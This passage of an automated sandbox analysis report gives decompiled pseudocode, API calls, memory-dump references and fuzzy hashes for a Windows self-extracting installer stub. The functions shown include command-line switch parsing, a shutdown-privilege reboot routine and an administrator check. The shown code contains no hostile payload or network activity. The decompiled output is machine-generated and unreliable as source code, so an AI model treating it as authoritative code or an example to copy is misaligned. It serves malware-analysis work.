                  				}
                  			}

                  APIs
                  • GetFileAttributesA.KERNELBASE(?,00F34658,?,?,00F34CDB,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 00F364CB
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00F34BA0(long _a4) {
                  				void* _t2;
                  
                  				_t2 = GlobalAlloc(0, _a4); // executed
                  				return _t2;
                  			}





                  APIs
                  • GlobalAlloc.KERNELBASE(00000000,?), ref: 00F34BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AllocGlobal
                  • String ID:
                  • API String ID: 3761449716-0
                  • Opcode ID: fc134fc1f2cb2422e216742e90b08eafc446930be16382ebc2d5ea41c4948cbb
                  • Instruction ID: 53ce838ff08f39e99e6a7679a53eecf704b1893564808e693ed5e799465d8398
                  • Opcode Fuzzy Hash: fc134fc1f2cb2422e216742e90b08eafc446930be16382ebc2d5ea41c4948cbb
                  • Instruction Fuzzy Hash: 56B0123304420CB7CB001BC3EC09F857F1ED7C4771F000000F71C050508A739410A7A2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00F34BC0(void* _a4) {
                  				void* _t2;
                  
                  				_t2 = GlobalFree(_a4); // executed
                  				return _t2;
                  			}





                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: FreeGlobal
                  • String ID:
                  • API String ID: 2979337801-0
                  • Opcode ID: 617118682b59f18ce8ba9d748c74a524b94699e6c8dffcaf32bb52fd280d5b28
                  • Instruction ID: 3b4f230c81c447d5121bc896effe40689d64db731c566fd420f54fb63321eb35
                  • Opcode Fuzzy Hash: 617118682b59f18ce8ba9d748c74a524b94699e6c8dffcaf32bb52fd280d5b28
                  • Instruction Fuzzy Hash: DDB0123100010CF78B011F53EC088453F1EE6C03707040010F40C410308B3298219581
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  C-Code - Quality: 90%
                  			E00F35B88(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                  				signed int _v8;
                  				signed int _v12;
                  				CHAR* _v265;
                  				char _v266;
                  				char _v267;
                  				char _v268;
                  				CHAR* _v272;
                  				char _v276;
                  				signed int _v296;
                  				char _v556;
                  				signed int _t53;
                  				int _t56;
                  				CHAR* _t60;
                  				signed int _t63;
                  				void* _t67;
                  				char _t71;
                  				void* _t75;
                  				void* _t77;
                  				void* _t79;
                  				char _t80;
                  				intOrPtr _t81;
                  				void* _t93;
                  				intOrPtr _t94;
                  				CHAR* _t97;
                  				intOrPtr _t98;
                  				void* _t104;
                  				intOrPtr _t105;
                  				CHAR* _t106;
                  				void* _t109;
                  				void* _t110;
                  				void* _t114;
                  				intOrPtr _t115;
                  				CHAR* _t117;
                  				void* _t120;
                  				intOrPtr _t121;
                  				CHAR* _t130;
                  				void* _t133;
                  				signed int _t134;
                  				void* _t135;
                  				void* _t136;
                  				void* _t137;
                  				void* _t139;
                  				CHAR* _t146;
                  				void* _t147;
                  				char _t151;
                  				char _t154;
                  				CHAR* _t155;
                  				int _t165;
                  				intOrPtr* _t171;
                  				intOrPtr* _t180;
                  				char* _t183;
                  				void* _t187;
                  				void* _t190;
                  				void* _t191;
                  				int _t194;
                  				void* _t195;
                  				void* _t197;
                  				void* _t198;
                  				char* _t203;
                  				char* _t204;
                  				signed int _t205;
                  				signed int _t207;
                  
                  				_t53 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t53 ^ _t205;
                  				_push(__ebx);
                  				_t146 = __ecx;
                  				_push(__esi);
                  				_t56 = 1;
                  				_push(__edi);
                  				_t194 = 1;
                  				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                  					L129:
                  					_pop(_t195);
                  					_pop(_t197);
                  					_pop(_t147);
                  					return E00F36C20(_t56, _t147, _v8 ^ _t205, _t188, _t195, _t197);
                  				} else {
                  					L2:
                  					while(_t194 != 0) {
                  						_t60 =  *_t146;
                  						if(_t60 == 0x20 || _t60 == 9 || _t60 == 0xd || _t60 == 0xa || _t60 == 0xb || _t60 == 0xc) {
                  							_t146 = CharNextA(_t146);
                  							continue;
                  						}
                  						_v272 = _t146;
                  						if( *_t146 == 0) {
                  							break;
                  						} else {
                  							_t165 = 0;
                  							_t188 = 0;
                  							_t198 = 0;
                  							do {
                  								if(_t188 != 0) {
                  									if(_t198 != 0) {
                  										break;
                  									} else {
                  										goto L21;
                  									}
                  								} else {
                  									_t60 =  *_t146;
                  									if(_t60 == 0x20 || _t60 == 9 || _t60 == 0xd || _t60 == 0xa || _t60 == 0xb || _t60 == 0xc) {
                  										break;
                  									} else {
                  										L21:
                  										_t60 =  *_t146;
                  										if(_t60 != 0x22) {
                  											if(_t165 >= 0x103) {
                  												goto L110;
                  											} else {
                  												 *(_t205 + _t165 - 0x108) = _t60;
                  												_t165 = _t165 + 1;
                  												_t146 =  &(_t146[1]);
                  												goto L31;
                  											}
                  										} else {
                  											_t3 =  &(_t146[1]); // 0x1
                  											_t60 = _t3;
                  											if( *_t60 == 0x22) {
                  												if(_t165 >= 0x103) {
                  													L110:
                  													_t56 = 0;
                  													goto L129;
                  												} else {
                  													 *(_t205 + _t165 - 0x108) = 0x22;
                  													_t165 = _t165 + 1;
                  													_t60 = 2;
                  													_t146 =  &(_t146[_t60]);
                  													L31:
                  													_v272 = _t146;
                  													goto L32;
                  												}
                  											} else {
                  												if(_t188 != 0) {
                  													_t198 = 1;
                  												} else {
                  													_t188 = _t188 + 1;
                  												}
                  												_t146 = _t60;
                  												_v272 = _t60;
                  												goto L32;
                  											}
                  										}
                  									}
                  								}
                  								goto L135;
                  								L32:
                  							} while ( *_t146 != 0);
                  							if(_t165 >= 0x104) {
                  								E00F36D85(_t60, _t146, _t165, _t188, _t194, _t198);
                  								asm("int3");
                  								asm("int3");
                  								asm("int3");
                  								asm("int3");
                  								asm("int3");
                  								asm("int3");
                  								_push(_t205);
                  								_t206 = _t207;
                  								_t63 =  *0xf38000; // 0xfdaca2c3
                  								_v296 = _t63 ^ _t207;
                  								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                  									0x4f0 = 2;
                  									_t67 = E00F35849( &_v272, 0x4f0, _t194, 0x4f0); // executed
                  								} else {
                  									E00F34327(0, 0x4f0, _t66, _t66, 0x10, _t66);
                  									 *0xf39a88 = E00F3613C();
                  									_t67 = 0;
                  								}
                  								return E00F36C20(_t67, _t146, _v12 ^ _t206, 0x4f0, _t194, _t198);
                  							} else {
                  								 *(_t205 + _t165 - 0x108) = 0;
                  								if(_t188 == 0) {
                  									if(_t198 != 0) {
                  										goto L36;
                  									} else {
                  										goto L42;
                  									}
                  								} else {
                  									if(_t198 != 0) {
                  										L42:
                  										_t71 = _v268;
                  										if(_t71 == 0x2f || _t71 == 0x2d) {
                  											_t75 = CharUpperA(_v267) - 0x3f;
                  											if(_t75 == 0) {
                  												_t188 = 0x521;
                  												E00F34327(0, 0x521, 0xf31111, 0, 0x40, 0);
                  												_t77 =  *0xf385c8; // 0x0
                  												if(_t77 != 0) {
                  													CloseHandle(_t77);
                  												}
                  												ExitProcess(0);
                  											}
                  											_t79 = _t75 - 4;
                  											if(_t79 == 0) {
                  												_t80 = _v266;
                  												if(_t80 != 0) {
                  													if(_t80 != 0x3a) {
                  														goto L51;
                  													} else {
                  														_t151 = (0 | _v265 == 0x00000022) + 3;
                  														_t200 =  &_v268 + _t151;
                  														_t171 =  &_v268 + _t151;
                  														_t42 = _t171 + 1; // 0x1
                  														_t188 = _t42;
                  														do {
                  															_t81 =  *_t171;
                  															_t171 = _t171 + 1;
                  														} while (_t81 != 0);
                  														if(_t171 == _t188) {
                  															goto L104;
                  														} else {
                  															_t190 = 0x5b;
                  															if(E00F36494(_t200, _t190) == 0) {
                  																L119:
                  																_t191 = 0x5d;
                  																if(E00F36494(_t200, _t191) == 0) {
                  																	L121:
                  																	_t188 =  &_v276;
                  																	_v276 = _t151;
                  																	if(E00F35AFE(_t200,  &_v276) == 0) {
                  																		goto L104;
                  																	} else {
                  																		_t188 = 0x104;
                  																		E00F31485(0xf38b62, 0x104, _v276 + _t151 +  &_v268);
                  																		goto L123;
                  																	}
                  																} else {
                  																	_t188 = 0x5b;
                  																	if(E00F36494(_t200, _t188) == 0) {
                  																		goto L104;
                  																	} else {
                  																		goto L121;
                  																	}
                  																}
                  															} else {
                  																_t188 = 0x5d;
                  																if(E00F36494(_t200, _t188) == 0) {
                  																	goto L104;
                  																} else {
                  																	goto L119;
                  																}
                  															}
                  														}
                  													}
                  												} else {
                  													 *0xf38944 = 1;
                  												}
                  												goto L52;
                  											} else {
                  												_t93 = _t79 - 1;
                  												if(_t93 == 0) {
                  													L100:
                  													if(_v266 != 0x3a) {
                  														goto L51;
                  													} else {
                  														_t154 = (0 | _v265 == 0x00000022) + 3;
                  														_t202 =  &_v268 + _t154;
                  														_t180 =  &_v268 + _t154;
                  														_t30 = _t180 + 1; // 0x1
                  														_t188 = _t30;
                  														do {
                  															_t94 =  *_t180;
                  															_t180 = _t180 + 1;
                  														} while (_t94 != 0);
                  														if(_t180 != _t188) {
                  															_t188 =  &_v276;
                  															_v276 = _t154;
                  															if(E00F35AFE(_t202,  &_v276) == 0) {
                  																goto L104;
                  															} else {
                  																_t97 = CharUpperA(_v267);
                  																_t183 =  &_v268;
                  																_t98 = _v276;
                  																if(_t97 != 0x54) {
                  																	_t99 = _t98 + _t154;
                  																	_t155 = 0xf3895a;
                  																} else {
                  																	_t99 = _t98 + _t154;
                  																	_t155 = 0xf38a5e;
                  																}
                  																E00F31485(_t155, 0x104, _t99 + _t183);
                  																_t188 = 0x104;
                  																E00F364E7(_t155, 0x104, 0xf31111);
                  																if(E00F33086(_t155) != 0) {
                  																	goto L123;
                  																} else {
                  																	goto L110;
                  																}
                  															}
                  														} else {
                  															L104:
                  															_t146 = _v272;
                  															goto L51;
                  														}
                  													}
                  												} else {
                  													_t104 = _t93 - 0xa;
                  													if(_t104 == 0) {
                  														_t105 = _v266;
                  														if(_t105 != 0) {
                  															if(_t105 != 0x3a) {
                  																goto L51;
                  															} else {
                  																if(_v265 != 0) {
                  																	_t203 =  &_v265;
                  																	do {
                  																		_t106 =  *_t203;
                  																		_t203 = _t203 + 1;
                  																		_t109 = CharUpperA(_t106) - 0x45;
                  																		if(_t109 == 0) {
                  																			 *0xf3894c = 1;
                  																		} else {
                  																			_t187 = 2;
                  																			_t110 = _t109 - _t187;
                  																			if(_t110 == 0) {
                  																				 *0xf38950 = 1;
                  																			} else {
                  																				if(_t110 == 0xf) {
                  																					 *0xf38954 = 1;
                  																				} else {
                  																					_t194 = 0;
                  																				}
                  																			}
                  																		}
                  																	} while ( *_t203 != 0);
                  																	goto L123;
                  																}
                  															}
                  														} else {
                  															 *0xf3894c = 1;
                  														}
                  														goto L52;
                  													} else {
                  														_t114 = _t104 - 3;
                  														if(_t114 == 0) {
                  															_t115 = _v266;
                  															if(_t115 != 0) {
                  																if(_t115 != 0x3a) {
                  																	goto L51;
                  																} else {
                  																	_t117 = CharUpperA(_v265);
                  																	if(_t117 == 0x31) {
                  																		goto L78;
                  																	} else {
                  																		if(_t117 == 0x41) {
                  																			goto L79;
                  																		} else {
                  																			if(_t117 == 0x55) {
                  																				goto L78;
                  																			} else {
                  																				goto L51;
                  																			}
                  																		}
                  																	}
                  																}
                  															} else {
                  																L78:
                  																_push(2);
                  																_pop(1);
                  																L79:
                  																 *0xf38958 = 1;
                  															}
                  															goto L52;
                  														} else {
                  															_t120 = _t114 - 1;
                  															if(_t120 == 0) {
                  																_t121 = _v266;
                  																if(_t121 != 0) {
                  																	if(_t121 != 0x3a) {
                  																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                  																			goto L51;
                  																		}
                  																	} else {
                  																		 *0xf39a6c = 1;
                  																		if(_v265 != 0) {
                  																			_t204 =  &_v265;
                  																			do {
                  																				_t130 =  *_t204;
                  																				_t204 = _t204 + 1;
                  																				_t133 = CharUpperA(_t130) - 0x41;
                  																				if(_t133 == 0) {
                  																					_t134 = 2;
                  																					 *0xf39a6c =  *0xf39a6c | _t134;
                  																					goto L72;
                  																				} else {
                  																					_t135 = _t133 - 3;
                  																					if(_t135 == 0) {
                  																						 *0xf38c68 =  *0xf38c68 | 0x00000040;
                  																					} else {
                  																						_t136 = _t135 - 5;
                  																						if(_t136 == 0) {
                  																							 *0xf39a6c =  *0xf39a6c & 0xfffffffd;
                  																							goto L72;
                  																						} else {
                  																							_t137 = _t136 - 5;
                  																							if(_t137 == 0) {
                  																								 *0xf39a6c =  *0xf39a6c & 0xfffffffe;
                  																								goto L72;
                  																							} else {
                  																								_t139 = _t137;
                  																								if(_t139 == 0) {
                  																									 *0xf38c68 =  *0xf38c68 | 0x00000080;
                  																								} else {
                  																									if(_t139 == 3) {
                  																										 *0xf39a6c =  *0xf39a6c | 0x00000004;
                  																										L72:
                  																										 *0xf38948 = 1;
                  																									} else {
                  																										_t194 = 0;
                  																									}
                  																								}
                  																							}
                  																						}
                  																					}
                  																				}
                  																			} while ( *_t204 != 0);
                  																			L123:
                  																			_t146 = _v272;
                  																		}
                  																	}
                  																} else {
                  																	 *0xf39a6c = 3;
                  																	 *0xf38948 = 1;
                  																}
                  																goto L52;
                  															} else {
                  																if(_t120 == 0) {
                  																	goto L100;
                  																} else {
                  																	L51:
                  																	_t194 = 0;
                  																	L52:
                  																	if( *_t146 != 0) {
                  																		goto L2;
                  																	} else {
                  																		break;
                  																	}
                  																}
                  															}
                  														}
                  													}
                  												}
                  											}
                  										} else {
                  											goto L110;
                  										}
                  									} else {
                  										L36:
                  										_t194 = 0;
                  										break;
                  									}
                  								}
                  							}
                  						}
                  						goto L135;
                  					}
                  					if( *0xf3894c != 0 &&  *0xf38a5e == 0) {
                  						if(GetModuleFileNameA( *0xf39164, 0xf38a5e, 0x104) == 0) {
                  							_t194 = 0;
                  						} else {
                  							_t188 = 0x5c;
                  							 *((char*)(E00F365AF(0xf38a5e, _t188) + 1)) = 0;
                  						}
                  					}
                  					_t56 = _t194;
                  					goto L129;
                  				}
                  				L135:
                  			}

                  0x00f35d7b
                  0x00f35e31
                  0x00000000
                  0x00f35e37
                  0x00f35d81
                  0x00f35d8b
                  0x00f35d90
                  0x00f35d94
                  0x00f35d9b
                  0x00f35d9b
                  0x00f35d9e
                  0x00f35da9
                  0x00f35dac
                  0x00f35dfc
                  0x00f35dfd
                  0x00000000
                  0x00f35dae
                  0x00f35dae
                  0x00f35db1
                  0x00f35df1
                  0x00f35db3
                  0x00f35db3
                  0x00f35db6
                  0x00f35de8
                  0x00000000
                  0x00f35db8
                  0x00f35db8
                  0x00f35dbb
                  0x00f35ddf
                  0x00000000
                  0x00f35dbd
                  0x00f35dbe
                  0x00f35dbf
                  0x00f35dd3
                  0x00f35dc1
                  0x00f35dc4
                  0x00f35dca
                  0x00f35e03
                  0x00f35e03
                  0x00f35dc6
                  0x00f35dc6
                  0x00f35dc6
                  0x00f35dc4
                  0x00f35dbf
                  0x00f35dbb
                  0x00f35db6
                  0x00f35db1
                  0x00f35e09
                  0x00f36077
                  0x00f36077
                  0x00f36077
                  0x00f35d90
                  0x00f35d65
                  0x00f35d67
                  0x00f35d72
                  0x00f35d72
                  0x00000000
                  0x00f35d43
                  0x00f35d45
                  0x00000000
                  0x00f35d4b
                  0x00f35d4b
                  0x00f35d4b
                  0x00f35d4d
                  0x00f35d50
                  0x00000000
                  0x00f35d56
                  0x00000000
                  0x00f35d56
                  0x00f35d50
                  0x00f35d45
                  0x00f35d41
                  0x00f35d3a
                  0x00f35d31
                  0x00f35d28
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00f35c9e
                  0x00f35c9e
                  0x00f35c9e
                  0x00000000
                  0x00f35c9e
                  0x00f35c9c
                  0x00f35c98
                  0x00f35c88
                  0x00000000
                  0x00f35bee
                  0x00f35ca7
                  0x00f35cd2
                  0x00f360b0
                  0x00f35cd8
                  0x00f35cda
                  0x00f35ce5
                  0x00f35ce5
                  0x00f35cd2
                  0x00f360b2
                  0x00000000
                  0x00f360b2
                  0x00000000

                  APIs
                  • CharNextA.USER32(?,00000000,?,?), ref: 00F35BDB
                  • GetModuleFileNameA.KERNEL32(00F38A5E,00000104,00000000,?,?), ref: 00F35CCA
                  • CharUpperA.USER32(?), ref: 00F35D0C
                  • CharUpperA.USER32(00000001), ref: 00F35DA0
                  • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00F35E29
                  • CharUpperA.USER32(?), ref: 00F35E64
                  • CharUpperA.USER32(?), ref: 00F35EBA
                  • CharUpperA.USER32(?), ref: 00F35F56
                  • CloseHandle.KERNEL32(00000000,00F31111,00000000,00000040,00000000), ref: 00F360A3
                  • ExitProcess.KERNEL32 ref: 00F360AA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                  • String ID: "$"$:$RegServer
                  • API String ID: 1203814774-25366791
                  • Opcode ID: 915e624bb999f733650ab6a0056b88f55fcf7e7403dd455e0b15740de97b845a
                  • Instruction ID: 8029eea2576d8102d6f4c096533733cbdcb8c5fa75908f3e723c9cadcb271a23
                  • Opcode Fuzzy Hash: 915e624bb999f733650ab6a0056b88f55fcf7e7403dd455e0b15740de97b845a
                  • Instruction Fuzzy Hash: A2D16EB1D08B589ADF358B388C483B67B62ABD5F70F1440A5D8C2C7155DAB88EC2FB11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E00F31DC7(signed int __ecx, void* __edi, void* __esi) {
                  				signed int _v8;
                  				int _v12;
                  				struct _TOKEN_PRIVILEGES _v24;
                  				void* _v28;
                  				void* __ebx;
                  				signed int _t13;
                  				int _t21;
                  				void* _t25;
                  				int _t28;
                  				signed char _t30;
                  				void* _t38;
                  				void* _t40;
                  				void* _t41;
                  				signed int _t46;
                  
                  				_t41 = __esi;
                  				_t38 = __edi;
                  				_t30 = __ecx;
                  				if((__ecx & 0x00000002) != 0) {
                  					L12:
                  					if((_t30 & 0x00000004) != 0) {
                  						L14:
                  						if( *0xf39a80 != 0) {
                  							_pop(_t30);
                  							_t44 = _t46;
                  							_t13 =  *0xf38000; // 0xfdaca2c3
                  							_v8 = _t13 ^ _t46;
                  							_push(_t38);
                  							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                  								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                  								_v24.PrivilegeCount = 1;
                  								_v12 = 2;
                  								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                  								CloseHandle(_v28);
                  								_t41 = _t41;
                  								_push(0);
                  								if(_t21 != 0) {
                  									if(ExitWindowsEx(2, ??) != 0) {
                  										_t25 = 1;
                  									} else {
                  										_t37 = 0x4f7;
                  										goto L3;
                  									}
                  								} else {
                  									_t37 = 0x4f6;
                  									goto L4;
                  								}
                  							} else {
                  								_t37 = 0x4f5;
                  								L3:
                  								_push(0);
                  								L4:
                  								_push(0x10);
                  								_push(0);
                  								_push(0);
                  								E00F34327(0, _t37);
                  								_t25 = 0;
                  							}
                  							_pop(_t40);
                  							return E00F36C20(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                  						} else {
                  							_t28 = ExitWindowsEx(2, 0);
                  							goto L16;
                  						}
                  					} else {
                  						_t37 = 0x522;
                  						_t28 = E00F34327(0, 0x522, 0xf31111, 0, 0x40, 4);
                  						if(_t28 != 6) {
                  							goto L16;
                  						} else {
                  							goto L14;
                  						}
                  					}
                  				} else {
                  					__eax = E00F31CD4(__ecx);
                  					if(__eax != 2) {
                  						L16:
                  						return _t28;
                  					} else {
                  						goto L12;
                  					}
                  				}
                  			}

















                  APIs
                  • GetCurrentProcess.KERNEL32(00000028,?,00000000), ref: 00F31D2D
                  • OpenProcessToken.ADVAPI32(00000000), ref: 00F31D34
                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00F31E0A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Process$CurrentExitOpenTokenWindows
                  • String ID: SeShutdownPrivilege
                  • API String ID: 2795981589-3733053543
                  • Opcode ID: e4fe95c98706113fba19e31fd906768f9b9a05e52f1c1568f7b685180a8ebe8a
                  • Instruction ID: 8bdae57282fef49752991a6204d42eb03b57e075038732597a1309925a532643
                  • Opcode Fuzzy Hash: e4fe95c98706113fba19e31fd906768f9b9a05e52f1c1568f7b685180a8ebe8a
                  • Instruction Fuzzy Hash: EE21DEB1B40209B7EB205B62DC4AFBF7679FB86771F104429FA06D6180DB759800B661
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 57%
                  			E00F315FC(intOrPtr* __ecx) {
                  				signed int _v8;
                  				short _v12;
                  				struct _SID_IDENTIFIER_AUTHORITY _v16;
                  				void* _v20;
                  				_Unknown_base(*)()* _v24;
                  				intOrPtr* _v28;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t14;
                  				_Unknown_base(*)()* _t20;
                  				long _t28;
                  				void* _t35;
                  				struct HINSTANCE__* _t36;
                  				signed int _t38;
                  				intOrPtr* _t39;
                  
                  				_t14 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t14 ^ _t38;
                  				_v12 = 0x500;
                  				_t37 = __ecx;
                  				_v16.Value = 0;
                  				_v28 = __ecx;
                  				_t28 = 0;
                  				_t36 = LoadLibraryA("advapi32.dll");
                  				if(_t36 != 0) {
                  					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                  					_v24 = _t20;
                  					if(_t20 != 0) {
                  						 *_t37 = 0;
                  						_t28 = 1;
                  						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v20) != 0) {
                  							_t37 = _t39;
                  							 *0xf3a290(0, _v20, _v28);
                  							_v24();
                  							if(_t39 != _t39) {
                  								asm("int 0x29");
                  							}
                  							FreeSid(_v20);
                  						}
                  					}
                  					FreeLibrary(_t36);
                  				}
                  				return E00F36C20(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                  			}



















                  APIs
                  • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00F316F0), ref: 00F31628
                  • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00F3163A
                  • AllocateAndInitializeSid.ADVAPI32(00F316F0,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F316F0), ref: 00F31663
                  • FreeSid.ADVAPI32(?,?,?,?,00F316F0), ref: 00F31691
                  • FreeLibrary.KERNEL32(00000000,?,?,?,00F316F0), ref: 00F31698
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                  • String ID: CheckTokenMembership$advapi32.dll
                  • API String ID: 4204503880-1888249752
                  • Opcode ID: 030b32a4214625eee87653bf9b1258f02a57f191f2ed1d08459c068849aaa29c
                  • Instruction ID: aca85e35fde023bcf9907b31563682c8bdf0bdd9004d8e82cae571e1c1fe93be
                  • Opcode Fuzzy Hash: 030b32a4214625eee87653bf9b1258f02a57f191f2ed1d08459c068849aaa29c
                  • Instruction Fuzzy Hash: 0911B971E0020DABDB049FA5DC4AABEBBB9FB49731F14006DF901E3250DA718D00EB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00F375A8() {
                  				void* _v8;
                  				struct _FILETIME _v16;
                  				signed int _v20;
                  				union _LARGE_INTEGER _v24;
                  				signed int _t23;
                  				signed int _t35;
                  				signed int _t36;
                  				signed int _t39;
                  
                  				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                  				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                  				_t23 =  *0xf38000; // 0xfdaca2c3
                  				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                  					GetSystemTimeAsFileTime( &_v16);
                  					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                  					_v8 = _v8 ^ GetCurrentProcessId();
                  					_v8 = _v8 ^ GetCurrentThreadId();
                  					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                  					QueryPerformanceCounter( &_v24);
                  					_t35 = _v20 ^ _v24.LowPart;
                  					_t39 = _v8 ^ _t35;
                  					if(_t39 == 0xbb40e64e || ( *0xf38000 & 0xffff0000) == 0) {
                  						_t39 = 0xbb40e64f;
                  					}
                  					 *0xf38000 = _t39;
                  					 *0xf38004 =  !_t39;
                  					return _t35;
                  				} else {
                  					_t36 =  !_t23;
                  					 *0xf38004 = _t36;
                  					return _t36;
                  				}
                  			}











                  APIs
                  • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F375DE
                  • GetCurrentProcessId.KERNEL32 ref: 00F375ED
                  • GetCurrentThreadId.KERNEL32 ref: 00F375F6
                  • GetTickCount.KERNEL32 ref: 00F375FF
                  • QueryPerformanceCounter.KERNEL32(?), ref: 00F37614
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                  • String ID:
                  • API String ID: 1445889803-0
                  • Opcode ID: 64a0698bfdd884865503d3eac012c52ce86e105f9fd793ebbbca249e40c16d5b
                  • Instruction ID: 1608a07d18c080b984a143d6c9299a38bb56440f3725d4dcfbf8edc92e0606f4
                  • Opcode Fuzzy Hash: 64a0698bfdd884865503d3eac012c52ce86e105f9fd793ebbbca249e40c16d5b
                  • Instruction Fuzzy Hash: C5115BB1D04208EBCB14EBA9DA496AEB7F5FF08334F55446AE506E7210EB349A04EF51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00F36C35(struct _EXCEPTION_POINTERS* _a4) {
                  
                  				SetUnhandledExceptionFilter(0);
                  				UnhandledExceptionFilter(_a4);
                  				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                  			}



                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F36D7C,00F310D8), ref: 00F36C3C
                  • UnhandledExceptionFilter.KERNEL32(00F36D7C,?,00F36D7C,00F310D8), ref: 00F36C45
                  • GetCurrentProcess.KERNEL32(C0000409,?,00F36D7C,00F310D8), ref: 00F36C50
                  • TerminateProcess.KERNEL32(00000000,?,00F36D7C,00F310D8), ref: 00F36C57
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                  • String ID:
                  • API String ID: 3231755760-0
                  • Opcode ID: 0ef11d8cc318a8a53dc2399db507bdadda3a5cff84661302ff43c0b130abe5ec
